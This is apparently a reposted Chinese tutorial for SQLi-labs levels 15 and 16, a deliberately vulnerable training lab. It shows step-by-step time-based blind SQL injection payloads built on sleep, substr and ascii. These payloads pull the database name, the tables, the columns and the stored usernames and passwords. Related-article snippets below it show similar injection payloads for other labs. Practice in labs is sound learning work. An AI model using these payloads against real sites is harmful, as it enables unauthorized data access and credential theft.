SQLI-labs-第十五关和第十六关

2024-05-06 17:04

本文主要是介绍SQLI-labs-第十五关和第十六关,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

知识点:

第十五关

1、判断注入点

2、判断当前数据库

3、判断表名

4、判断字段名

5、爆值

第十六关

1、判断注入点


知识点:

POST方式的时间盲注

对应的函数利用,可参考SQLI-labs-第九关和第十关_sqllab第十关-CSDN博客

第十五关

原理:

1、判断注入点

输入正常的数据,没有任何回显

加入单引号、双引号、括号等,都没有任何回显信息,这里可以判断为时间盲注

输入  admin' and if(length(database())>1,sleep(5),1)#

会延时5秒钟

说明当前是单引号闭合错误

这里有一个问题,使用字符就可以显示出结果,数字就不行,这个没搞懂,麻烦大神指点一下

admin' and if(length(database())>1,sleep(5),1)#    可以延时5秒

1' and if(length(database())>1,sleep(5),1)#      不会延时

2、判断当前数据库

使用函数if(),length()、sleep()、substr()、ascii()

admin' and if(length(database())=8,sleep(5),1)#

说明当前数据库长度为8位

接下来判断数据库的字符,从a开始尝试

admin' and if(ascii(substr(database(),1,1))=97,sleep(5),1)#

结果没有延时

尝试到s的时候出现了延时,说明数据库名第一个字符为s

admin' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#

以此类推,通过修改substr()函数的值,可以得到当前数据库名为security

3、判断表名

还是一样,判断第一个表名的一个个字符,从a开始判断

admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=97,sleep(5),1)#

admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)#

以此类推,通过修改limit和substr的值,可以判断出4个表为  emails 、referers、uagents、users

4、判断字段名

以users表为例

admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(5),1)#

以此类推,可以推断出三个字段为:id、username、password

5、爆值

admin' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(5),1)#

admin' and if(ascii(substr((select password from security.users limit 0,1),1,1))=68,sleep(5),1)#

以此类推,可以得到数据库的数据


第十六关

原理:

1、判断注入点

因为输入任何信息都没有回显,所以只能采用时间盲注的方式来进行判断,在输入的值后面分别尝试加入’ " ) 等进行尝试

admin") and if(length(database())>1,sleep(5),1) #

接下来的步骤就跟上面的一致,使用ascii、substr函数等进行注入


这篇文章就写到这里了,有哪里不足,欢迎批评指正!

这篇关于SQLI-labs-第十五关和第十六关的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/964875

相关文章

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

安装 SideFX Labs

介绍 SideFX Labs 是一个完全免费开源的工具集。GIT地址:github.com/sideeffects/SideFXLabs 它是一个针对150多种工具的测试场,由于这些工具是在常规的 Houdini 开发周期之外开发的,因此可以更方便地进行测试和反馈。 其中的工具总结了常见的工作流程,并与常用软件建立了紧密的集成。目的是帮助用户更快地启动和执行“数字化内容创建”中常见的各种任

第十六篇:走入计算机网络的传输层--传输层概述

1. 传输层的功能 ① 分割与重组数据 一次数据传输有大小限制,传输层需要做数据分割,所以在数据送达后必然也需要做数据重组。 ② 按端口号寻址 IP只能定位数据哪台主机,无法判断数据报文应该交给哪个应用,传输层给每个应用都设置了一个编号,这个编号就是端口,目的端口可以定位报文应该发给哪个应用处理。 ③ 连接管理 面向连接的传输,需要对连接进行管理。 ④ 差错控制和流量控制

第十六题:最接近的三数之和

题目描述 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。返回这三个数的和。假定每组输入只存在唯一答案。 示例: 输入:nums = [-1, 2, 1, -4], target = 1 输出:2 解释:与 target 最接近的和为 2 (-1 + 2 + 1 = 2)。 注意: 3 <= nu

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

sqli-lab靶场学习(一)——Less1

前言 最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。 安装部署 网上很多关于安装部署的教程,很简单。本人是下载PHPStudy进行部署的。由于sqli-lab是用php5版本,现在很多一体化环境(我用wamp)的php都是7版本。我试过

sqli-labs靶场通关攻略(61-65)

Less-61 步骤一:查看数据库 ?id=1')) and updatexml(1,concat(1,(select database())),1)--+ 步骤二:查看表名 ?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where ta

SQLi-LABS靶场56-60通过攻略

第56关(单引号括号闭合) 查数据库 ?id=-1') union select 1,database(),3 --+ 查表 ?id=-1') union select 1,(select table_name from information_schema.tables where table_schema=database()),3 --+ 查字段 ?id=-1') uni

sqli-labs靶场通关攻略 56-60

主页有sqli-labs靶场通关攻略 1-55 第五六关 less-56 步骤一:闭合方式:?id=1')-- + 步骤二:查询数据库 ?id=-1') union select 1,2,database() --+ 步骤三:联合查询 查出网站的数据库表名 ?id=-1') union select 1,2,group_concat(table_name) from inf